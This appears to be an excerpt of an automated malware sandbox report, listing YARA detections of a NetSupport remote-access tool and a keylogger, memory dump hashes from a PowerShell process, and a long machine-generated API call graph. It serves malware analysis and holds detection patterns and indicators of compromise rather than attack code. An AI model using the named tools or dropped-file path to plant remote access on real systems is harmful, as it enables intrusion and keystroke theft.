                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 27%, ReversingLabs
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:false

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:3.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:6
                                                                                                                                                    Total number of Limit Nodes:0

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 132034935-0
                                                                                                                                                    • Opcode ID: bcaa199a5bbaa868dfd9935e1a527b2240f88413579c87127577db80bf76424f
                                                                                                                                                    • Instruction ID: 5fff2564f1b91e303f92cbd93fc463fc53ba47c7b8beb39dc6194749e406c942
                                                                                                                                                    • Opcode Fuzzy Hash: bcaa199a5bbaa868dfd9935e1a527b2240f88413579c87127577db80bf76424f
                                                                                                                                                    • Instruction Fuzzy Hash: ED319231918A1C9FDB18DF5C98496F97BE1FB99315F04422EE049D3252CB74A816CB81

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 7638f5239412fac75c89b0802259ff8d2ecf06a1297f5bb603c51daf85a3c5cc
                                                                                                                                                    • Instruction ID: 4fc5615538299a25e64e4048f59d2af1f6c8b4f2ce8e270843e8a961933903a9
                                                                                                                                                    • Opcode Fuzzy Hash: 7638f5239412fac75c89b0802259ff8d2ecf06a1297f5bb603c51daf85a3c5cc
                                                                                                                                                    • Instruction Fuzzy Hash: 17215171908A1C9FDB58DF58D849AFABBE1FF55311F00422FD00AD3661DB74A806CB91

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 6ea384610235e6961984fdc741215f3e879a40b96cd47ebca7e6ea3ed647e436
                                                                                                                                                    • Instruction ID: 7495a56ca0c5f6dafc5f92bf00aa3a46266f6c842f65c18691b56a7c7ee8652a
                                                                                                                                                    • Opcode Fuzzy Hash: 6ea384610235e6961984fdc741215f3e879a40b96cd47ebca7e6ea3ed647e436
                                                                                                                                                    • Instruction Fuzzy Hash: 3C218031908A1C8FDB58DF98D849AEABBE1FF55311F00822FD009D3661CB74A805CB81

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 1c978fe1423273da1d88fbdd3cae860ac59169c7a12b40a2bfbfe4748bb2aaf8
                                                                                                                                                    • Instruction ID: 82fef0fcc4e1e6968a5b08f4021295402ac3eab52fb0d75e71f086a832902dd9
                                                                                                                                                    • Opcode Fuzzy Hash: 1c978fe1423273da1d88fbdd3cae860ac59169c7a12b40a2bfbfe4748bb2aaf8
                                                                                                                                                    • Instruction Fuzzy Hash: 5E21A13190CB9C8FDB56DF68D8446A9BFF0FF1A311F04426BD049D3662CB65A845CB81

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1902184315.00007FFECC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECC4B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecc4b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6c23a43cc279a114675589f3cf6e09abefe754b7112ee1f227b897dbf535c0b0
                                                                                                                                                    • Instruction ID: c0cfd0b1089a7a4a174f11ea26cdf9de3e15afc338e40f325e36b41f9b8a85b0
                                                                                                                                                    • Opcode Fuzzy Hash: 6c23a43cc279a114675589f3cf6e09abefe754b7112ee1f227b897dbf535c0b0
                                                                                                                                                    • Instruction Fuzzy Hash: 5F61CA3294DA8A0EE7199E2CAC510F5BBD4FF42334F04917EF4C9C35A2E919A883C340

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1892029858.00007FFECC2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECC2C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecc2c0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 809f9f41ddb6d4567eb70bb45b60279ca44a9f3625338a5857a5243820ee60d7
                                                                                                                                                    • Instruction ID: c240c7fdf252c76d7d0c6f72f5fe5e001e24d03f7c9700097898fbe6755d5d5e
                                                                                                                                                    • Opcode Fuzzy Hash: 809f9f41ddb6d4567eb70bb45b60279ca44a9f3625338a5857a5243820ee60d7
                                                                                                                                                    • Instruction Fuzzy Hash: D731A430A48E8A4FEB98DA1DD45077277E1FF95350F5541B9E00DCBAA6CA2AEC86C740
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 62cb96f19461b1774e7a891453b7b84c12607bd573fae75eac57b4bbe25cd9e5
                                                                                                                                                    • Instruction ID: 8826afd2ea93ad699615b8a386879e3c38e86b26012d604fd8e1ee43dd893380
                                                                                                                                                    • Opcode Fuzzy Hash: 62cb96f19461b1774e7a891453b7b84c12607bd573fae75eac57b4bbe25cd9e5
                                                                                                                                                    • Instruction Fuzzy Hash: F7F09622A1EE7E0FE2A6C61C18542B6A696EBD9621754017AE40FC32B6DD15D8068341
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1892029858.00007FFECC2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECC2C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecc2c0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3461937d8d6837810908b1ce7f0caa3237d7e44ff8f1e385e4003976dcdaccf0
                                                                                                                                                    • Instruction ID: c3bbf60bc3e6e5a33cb0c393c309741c95ea194c39bebd44539e8709061d609d
                                                                                                                                                    • Opcode Fuzzy Hash: 3461937d8d6837810908b1ce7f0caa3237d7e44ff8f1e385e4003976dcdaccf0
                                                                                                                                                    • Instruction Fuzzy Hash: B2E08611B5CD5D0F95D4FE1D68415A9B3D1EB98210790467AE40EC2377DC2DA8858380
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:

Execution Graph

Execution Coverage: 6.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 15%
Total number of Nodes: 2000
Total number of Limit Nodes: 77
11143bd0 std::_Mutex::_Mutex RegQueryValueExA 72021->72022 72024 11030fe8 72022->72024 72026 11143bd0 std::_Mutex::_Mutex RegQueryValueExA 72024->72026 72025 11031360 72028 111101b0 std::_Mutex::_Mutex 265 API calls 72025->72028 72027 11031011 72026->72027 72027->72003 72029 11031386 72028->72029 72030 11028980 268 API calls 72029->72030 72031 1103139f InterlockedExchange 72030->72031 72033 111101b0 std::_Mutex::_Mutex 265 API calls 72031->72033 72034 110313c7 72033->72034 72089 1108a880 72034->72089 72036 110313df GetACP 72100 11163f93 72036->72100 72041 11031410 72147 11143780 72041->72147 72044 111101b0 std::_Mutex::_Mutex 265 API calls 72045 1103145c 72044->72045 72153 11061aa0 72045->72153 72047 110314d4 72172 110ccc90 72047->72172 72050 111101b0 std::_Mutex::_Mutex 265 API calls 72052 110314ae 72050->72052 72232 11061710 72052->72232 72053 111101b0 std::_Mutex::_Mutex 265 API calls 72055 11031501 72053->72055 72179 11125d40 72055->72179 72081 11030f4a 72080->72081 72081->72003 72082 11163ca7 72081->72082 72083 11163c91 72082->72083 72245 1116450b 72083->72245 72087 11088b30 268 API calls 72086->72087 72088 1102898b _memset 72087->72088 72088->72025 72090 111101b0 std::_Mutex::_Mutex 265 API calls 72089->72090 72091 1108a8b7 72090->72091 72092 111101b0 std::_Mutex::_Mutex 265 API calls 72091->72092 72094 1108a8d9 InitializeCriticalSection 72091->72094 72095 1108a8d2 72092->72095 72096 1108a93a 72094->72096 72095->72094 72339 1116305a 66 API calls std::exception::_Copy_str 72095->72339 72096->72036 72098 1108a909 72340 111634b1 RaiseException 72098->72340 72101 11163fc6 72100->72101 72102 11163fb1 72100->72102 72101->72102 72103 11163fcd 72101->72103 72341 1116a1af 66 API calls __getptd_noexit 72102->72341 72343 1117027b 102 API calls 11 library calls 72103->72343 72106 11163fb6 72342 1116edc4 11 API calls __waccess_s 72106->72342 72107 11163ff3 72109 11031406 72107->72109 72344 111700e4 97 API calls 6 library calls 72107->72344 72111 111663a3 72109->72111 
72112 111663af ___DllMainCRTStartup 72111->72112 72113 111663d0 72112->72113 72114 111663b9 72112->72114 72116 1116c675 __getptd 66 API calls 72113->72116 72370 1116a1af 66 API calls __getptd_noexit 72114->72370 72118 111663d5 72116->72118 72117 111663be 72371 1116edc4 11 API calls __waccess_s 72117->72371 72120 11171306 ____lc_handle_func 74 API calls 72118->72120 72121 111663df 72120->72121 72122 1116ac7e __calloc_crt 66 API calls 72121->72122 72123 111663f5 72122->72123 72124 111663c9 ___DllMainCRTStartup _setlocale 72123->72124 72125 1117459f __lock 66 API calls 72123->72125 72124->72041 72126 1116640b 72125->72126 72345 11165814 72126->72345 72133 111664ec 72376 111710d5 8 API calls 72133->72376 72134 1116643b __tzset_nolock 72137 1117459f __lock 66 API calls 72134->72137 72136 111664f2 72377 1117116e 66 API calls 4 library calls 72136->72377 72139 11166461 72137->72139 72372 111712b9 74 API calls 3 library calls 72139->72372 72141 11166473 72373 111710d5 8 API calls 72141->72373 72143 11166479 72144 11166497 72143->72144 72374 111712b9 74 API calls 3 library calls 72143->72374 72375 111664e1 LeaveCriticalSection _doexit 72144->72375 72529 11143690 72147->72529 72149 11143690 IsDBCSLeadByte 72150 11143795 72149->72150 72150->72149 72151 11166654 85 API calls std::_Mutex::_Mutex 72150->72151 72152 1103143c 72150->72152 72151->72150 72152->72044 72154 11061710 293 API calls 72153->72154 72155 11061ade 72154->72155 72156 111101b0 std::_Mutex::_Mutex 265 API calls 72155->72156 72157 11061b0b 72156->72157 72158 11061b24 72157->72158 72159 11061710 293 API calls 72157->72159 72160 111101b0 std::_Mutex::_Mutex 265 API calls 72158->72160 72159->72158 72161 11061b35 72160->72161 72162 11061710 293 API calls 72161->72162 72164 11061b4e 72161->72164 72162->72164 72163 11031487 72163->72047 72163->72050 72164->72163 72541 11142e60 72164->72541 72166 11061b76 72550 11061a70 72166->72550 72173 110ccc99 72172->72173 72174 110314fa 72172->72174 72708 11145410 GetSystemMetrics 
GetSystemMetrics 72173->72708 72174->72053 72176 110ccca0 std::_Mutex::_Mutex 72176->72174 72177 110cccae CreateWindowExA 72176->72177 72177->72174 72178 110cccd8 SetClassLongA 72177->72178 72178->72174 72180 111101b0 std::_Mutex::_Mutex 265 API calls 72179->72180 72181 11125d74 72180->72181 72182 11125da5 72181->72182 72183 11125d8a 72181->72183 72709 11124f70 72182->72709 72755 110765c0 465 API calls std::_Mutex::_Mutex 72183->72755 72185 11125d9a 72185->72182 72231->72009 72233 111101b0 std::_Mutex::_Mutex 265 API calls 72232->72233 72234 11061761 72233->72234 72235 11061777 InitializeCriticalSection 72234->72235 73867 11061210 266 API calls 3 library calls 72234->73867 72238 110617b7 72235->72238 72243 11061826 72235->72243 73868 1105f830 287 API calls 3 library calls 72238->73868 72240 110617d8 RegCreateKeyExA 72241 11061832 RegCreateKeyExA 72240->72241 72242 110617ff RegCreateKeyExA 72240->72242 72241->72243 72244 11061865 RegCreateKeyExA 72241->72244 72242->72241 72242->72243 72243->72047 72244->72243 72246 11164524 72245->72246 72249 111642e0 72246->72249 72261 11164259 72249->72261 72251 11164304 72269 1116a1af 66 API calls __getptd_noexit 72251->72269 72254 11164309 72270 1116edc4 11 API calls __waccess_s 72254->72270 72257 1116433a 72259 11164381 72257->72259 72271 11171a63 79 API calls 3 library calls 72257->72271 72258 11030f5e 72258->72010 72259->72258 72272 1116a1af 66 API calls __getptd_noexit 72259->72272 72262 1116426c 72261->72262 72268 111642b9 72261->72268 72263 1116c675 __getptd 66 API calls 72262->72263 72264 11164271 72263->72264 72265 11164299 72264->72265 72273 11171306 72264->72273 72265->72268 72288 111715a2 68 API calls 6 library calls 72265->72288 72268->72251 72268->72257 72269->72254 72270->72258 72271->72257 72272->72258 72274 11171312 ___DllMainCRTStartup 72273->72274 72275 1116c675 __getptd 66 API calls 72274->72275 72276 11171317 72275->72276 72277 11171345 72276->72277 72278 11171329 72276->72278 72290 1117459f 72277->72290 
72280 1116c675 __getptd 66 API calls 72278->72280 72282 1117132e 72280->72282 72281 1117134c 72297 111712b9 74 API calls 3 library calls 72281->72297 72286 1117133c ___DllMainCRTStartup 72282->72286 72289 1116e66a 66 API calls 3 library calls 72282->72289 72284 11171360 72298 11171373 LeaveCriticalSection _doexit 72284->72298 72286->72265 72288->72268 72291 111745c7 EnterCriticalSection 72290->72291 72292 111745b4 72290->72292 72291->72281 72299 111744dd 72292->72299 72294 111745ba 72294->72291 72326 1116e66a 66 API calls 3 library calls 72294->72326 72297->72284 72298->72282 72300 111744e9 ___DllMainCRTStartup 72299->72300 72301 11174511 72300->72301 72302 111744f9 72300->72302 72308 1117451f ___DllMainCRTStartup 72301->72308 72330 1116ac39 72301->72330 72327 1116e85d 66 API calls 2 library calls 72302->72327 72304 111744fe 72328 1116e6ae 66 API calls 7 library calls 72304->72328 72308->72294 72309 11174505 72329 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72309->72329 72310 11174531 72336 1116a1af 66 API calls __getptd_noexit 72310->72336 72311 11174540 72314 1117459f __lock 65 API calls 72311->72314 72315 11174547 72314->72315 72317 1117454f InitializeCriticalSectionAndSpinCount 72315->72317 72318 1117457a 72315->72318 72319 1117456b 72317->72319 72320 1117455f 72317->72320 72321 11163aa5 _free 65 API calls 72318->72321 72338 11174596 LeaveCriticalSection _doexit 72319->72338 72322 11163aa5 _free 65 API calls 72320->72322 72321->72319 72323 11174565 72322->72323 72337 1116a1af 66 API calls __getptd_noexit 72323->72337 72327->72304 72328->72309 72332 1116ac42 72330->72332 72331 11163a11 _malloc 65 API calls 72331->72332 72332->72331 72333 1116ac78 72332->72333 72334 1116ac59 Sleep 72332->72334 72333->72310 72333->72311 72335 1116ac6e 72334->72335 72335->72332 72335->72333 72336->72308 72337->72319 72338->72308 72339->72098 72340->72094 72341->72106 72342->72109 72343->72107 72344->72109 72346 1116581d 72345->72346 72347 11165836 
72345->72347 72346->72347 72378 11171046 8 API calls 72346->72378 72349 111664d5 72347->72349 72379 111744c6 LeaveCriticalSection 72349->72379 72351 11166422 72352 11166187 72351->72352 72353 111661b0 72352->72353 72356 111661cb 72352->72356 72354 11165e4d __setlocale_set_cat 101 API calls 72353->72354 72357 111661ba 72353->72357 72354->72357 72355 1116631c 72380 11165c2c 72355->72380 72356->72355 72364 111662f5 72356->72364 72366 11166200 _strpbrk _strncmp _strcspn _strlen 72356->72366 72359 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72357->72359 72361 111663a1 72359->72361 72361->72133 72361->72134 72362 11166331 __tzset_nolock 72362->72357 72362->72364 72394 11165e4d 72362->72394 72364->72357 72440 11165ac7 70 API calls 6 library calls 72364->72440 72366->72357 72366->72364 72367 1116630e 72366->72367 72368 11165e4d __setlocale_set_cat 101 API calls 72366->72368 72436 111699f9 66 API calls __waccess_s 72366->72436 72437 1116ed72 72367->72437 72368->72366 72370->72117 72371->72124 72372->72141 72373->72143 72374->72144 72375->72124 72376->72136 72377->72124 72378->72347 72379->72351 72381 1116c675 __getptd 66 API calls 72380->72381 72382 11165c67 72381->72382 72391 11165ccd __tzset_nolock _memmove _strlen 72382->72391 72392 11165cd4 72382->72392 72484 1116cd5f 72382->72484 72383 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72384 11165e4b 72383->72384 72384->72362 72387 1116ed72 __invoke_watson 10 API calls 72387->72391 72389 1116cd5f _strcpy_s 66 API calls 72389->72391 72391->72387 72391->72389 72391->72392 72441 1116593d 72391->72441 72448 11174bcc 72391->72448 72493 11165a5c 66 API calls 3 library calls 72391->72493 72494 111699f9 66 API calls __waccess_s 72391->72494 72392->72383 72395 1116c675 __getptd 66 API calls 72394->72395 72396 11165e7a 72395->72396 72397 11165c2c __expandlocale 96 API calls 72396->72397 72401 11165ea2 __tzset_nolock _strlen 72397->72401 72398 11165ea9 72399 11162bb7 
__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72398->72399 72400 11165eb7 72399->72400 72400->72362 72401->72398 72402 1116ac39 __malloc_crt 66 API calls 72401->72402 72403 11165ef3 _memmove 72402->72403 72403->72398 72404 1116cd5f _strcpy_s 66 API calls 72403->72404 72411 11165f66 _memmove 72404->72411 72405 11166155 72406 1116ed72 __invoke_watson 10 API calls 72405->72406 72407 11166186 72406->72407 72408 111661b0 72407->72408 72417 111661cb 72407->72417 72409 111661ba 72408->72409 72412 11165e4d __setlocale_set_cat 100 API calls 72408->72412 72418 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72409->72418 72410 111662f5 72410->72409 72522 11165ac7 70 API calls 6 library calls 72410->72522 72411->72405 72428 1116606a _memcmp 72411->72428 72520 11174ea4 79 API calls 2 library calls 72411->72520 72412->72409 72413 1116631c 72419 11165c2c __expandlocale 96 API calls 72413->72419 72415 111660f0 72421 11163aa5 _free 66 API calls 72415->72421 72416 11166121 72416->72405 72422 1116612d InterlockedDecrement 72416->72422 72417->72410 72417->72413 72432 11166200 _strpbrk _strncmp _strcspn _strlen 72417->72432 72423 111663a1 72418->72423 72427 11166331 __tzset_nolock 72419->72427 72421->72398 72422->72405 72424 11166145 72422->72424 72423->72362 72425 11163aa5 _free 66 API calls 72424->72425 72426 1116614d 72425->72426 72429 11163aa5 _free 66 API calls 72426->72429 72427->72409 72427->72410 72430 11165e4d __setlocale_set_cat 100 API calls 72427->72430 72428->72415 72428->72416 72429->72405 72430->72427 72432->72409 72432->72410 72433 1116630e 72432->72433 72434 11165e4d __setlocale_set_cat 100 API calls 72432->72434 72521 111699f9 66 API calls __waccess_s 72432->72521 72435 1116ed72 __invoke_watson 10 API calls 72433->72435 72434->72432 72435->72409 72436->72366 72523 1116ec49 72437->72523 72440->72357 72443 11165956 _memset 72441->72443 72442 11165962 72442->72391 72443->72442 72446 11165985 _strcspn 72443->72446 72495 111699f9 66 API calls 
__waccess_s 72443->72495 72445 1116ed72 __invoke_watson 10 API calls 72445->72446 72446->72442 72446->72445 72496 111699f9 66 API calls __waccess_s 72446->72496 72449 1116c675 __getptd 66 API calls 72448->72449 72453 11174bd9 72449->72453 72450 11174be6 GetUserDefaultLCID 72467 11174c6d 72450->72467 72451 11174c10 72454 11174c78 72451->72454 72458 11174c22 72451->72458 72453->72450 72453->72451 72507 1117463f 85 API calls _LangCountryEnumProc@4 72453->72507 72454->72450 72460 11174c83 _strlen 72454->72460 72457 11174c36 72512 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 72457->72512 72458->72457 72462 11174c2d 72458->72462 72459 11174dae 72459->72391 72466 11174c89 EnumSystemLocalesA 72460->72466 72461 11174cde 72461->72459 72468 11174d03 IsValidCodePage 72461->72468 72508 11174b29 72462->72508 72465 11174c34 72465->72467 72513 1117463f 85 API calls _LangCountryEnumProc@4 72465->72513 72466->72467 72467->72459 72497 111746a1 72467->72497 72468->72459 72471 11174d15 IsValidLocale 72468->72471 72470 11174c54 72470->72467 72472 11174c6f 72470->72472 72473 11174c66 72470->72473 72471->72459 72477 11174d28 72471->72477 72514 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 72472->72514 72475 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 72473->72475 72475->72467 72476 11174d79 GetLocaleInfoA 72476->72459 72478 11174d8a GetLocaleInfoA 72476->72478 72477->72459 72477->72476 72479 1116cd5f _strcpy_s 66 API calls 72477->72479 72478->72459 72480 11174d9e 72478->72480 72481 11174d66 72479->72481 72515 1116c308 66 API calls _xtoa_s@20 72480->72515 72481->72478 72483 1116ed72 __invoke_watson 10 API calls 72481->72483 72483->72476 72485 1116cd74 72484->72485 72486 1116cd6d 72484->72486 72517 1116a1af 66 API calls __getptd_noexit 72485->72517 72486->72485 72489 1116cd92 72486->72489 72490 1116cd83 72489->72490 72519 1116a1af 66 API calls __getptd_noexit 72489->72519 72490->72391 72492 1116cd79 72518 1116edc4 11 API calls __waccess_s 72492->72518 72493->72391 
72494->72391 72495->72446 72496->72446 72498 111746fb GetLocaleInfoW 72497->72498 72499 111746ab __tzset_nolock 72497->72499 72500 11174717 72498->72500 72501 111746ea 72498->72501 72499->72498 72503 111746c1 __tzset_nolock 72499->72503 72500->72501 72502 1117471d GetACP 72500->72502 72501->72461 72502->72461 72504 111746d2 GetLocaleInfoW 72503->72504 72505 111746ef 72503->72505 72504->72501 72516 11163c91 79 API calls __wcstoi64 72505->72516 72507->72451 72509 11174b30 _GetPrimaryLen _strlen 72508->72509 72510 11174b66 EnumSystemLocalesA 72509->72510 72511 11174b80 72510->72511 72511->72465 72512->72465 72513->72470 72514->72467 72515->72459 72516->72501 72517->72492 72518->72490 72519->72492 72520->72428 72521->72432 72522->72409 72524 1116ec68 _memset __call_reportfault 72523->72524 72525 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 72524->72525 72528 1116ed54 __call_reportfault 72525->72528 72526 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72527 1116ed70 GetCurrentProcess TerminateProcess 72526->72527 72527->72357 72528->72526 72530 111436a6 72529->72530 72531 11143763 72530->72531 72536 11081d30 72530->72536 72531->72150 72533 111436cb 72534 11081d30 IsDBCSLeadByte 72533->72534 72535 111436fb _memmove 72534->72535 72535->72150 72537 11081d3c 72536->72537 72539 11081d41 std::_Mutex::_Mutex __mbschr_l 72536->72539 72540 11081c50 IsDBCSLeadByte 72537->72540 72539->72533 72540->72539 72542 11142e6a 72541->72542 72543 11142e6c 72541->72543 72542->72166 72544 11110230 std::_Mutex::_Mutex 265 API calls 72543->72544 72545 11142e92 72544->72545 72546 11142e9b _strncpy 72545->72546 72547 11142eb9 72545->72547 72546->72166 72553 11029a70 265 API calls 2 library calls 72547->72553 72554 11061970 72550->72554 72565 11061290 72554->72565 72558 11061a08 72612 11061170 72558->72612 72560 11061a1a 72562 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72560->72562 72561 110619cc 72561->72558 72564 11061320 
274 API calls 72561->72564 72563 11061a32 72562->72563 72564->72561 72566 111101b0 std::_Mutex::_Mutex 265 API calls 72565->72566 72567 110612ac 72566->72567 72568 110612f5 72567->72568 72569 110612b3 72567->72569 72624 1116305a 66 API calls std::exception::_Copy_str 72568->72624 72617 1105ee10 72569->72617 72572 110612eb 72576 11061320 72572->72576 72573 11061304 72625 111634b1 RaiseException 72573->72625 72575 11061319 72577 11061635 72576->72577 72582 11061355 72576->72582 72577->72561 72578 11061624 72579 1105ee10 68 API calls 72578->72579 72579->72577 72580 11061542 std::ios_base::_Tidy 72580->72578 72601 11146a90 268 API calls 72580->72601 72603 110615a0 72580->72603 72607 11081d30 IsDBCSLeadByte 72580->72607 72610 11061649 std::ios_base::_Tidy 72580->72610 72611 11081e70 86 API calls 72580->72611 72581 110614b4 72581->72578 72581->72580 72626 110611e0 72581->72626 72582->72581 72583 11061401 RegEnumValueA 72582->72583 72584 11061389 RegQueryInfoKeyA 72582->72584 72588 11061435 72583->72588 72589 1106149c 72583->72589 72586 110613c2 72584->72586 72587 110613ae 72584->72587 72592 110613e2 72586->72592 72636 11029a70 265 API calls 2 library calls 72586->72636 72635 11029a70 265 API calls 2 library calls 72587->72635 72594 11081d30 IsDBCSLeadByte 72588->72594 72599 1106146e RegEnumValueA 72588->72599 72588->72610 72637 11081e70 72588->72637 72593 11163aa5 _free 66 API calls 72589->72593 72597 11163a11 _malloc 66 API calls 72592->72597 72596 110614a9 72593->72596 72594->72588 72596->72581 72598 110613f0 72597->72598 72598->72583 72599->72588 72599->72589 72601->72580 72603->72580 72649 11029a70 265 API calls 2 library calls 72603->72649 72607->72580 72610->72561 72611->72580 72613 1105ee10 68 API calls 72612->72613 72614 110611a3 72613->72614 72615 110608e0 67 API calls 72614->72615 72616 110611c2 std::ios_base::_Tidy 72615->72616 72616->72560 72618 1105ee21 LeaveCriticalSection 72617->72618 72619 1105ee2b 72617->72619 72618->72619 72620 1105ee3f 72619->72620 
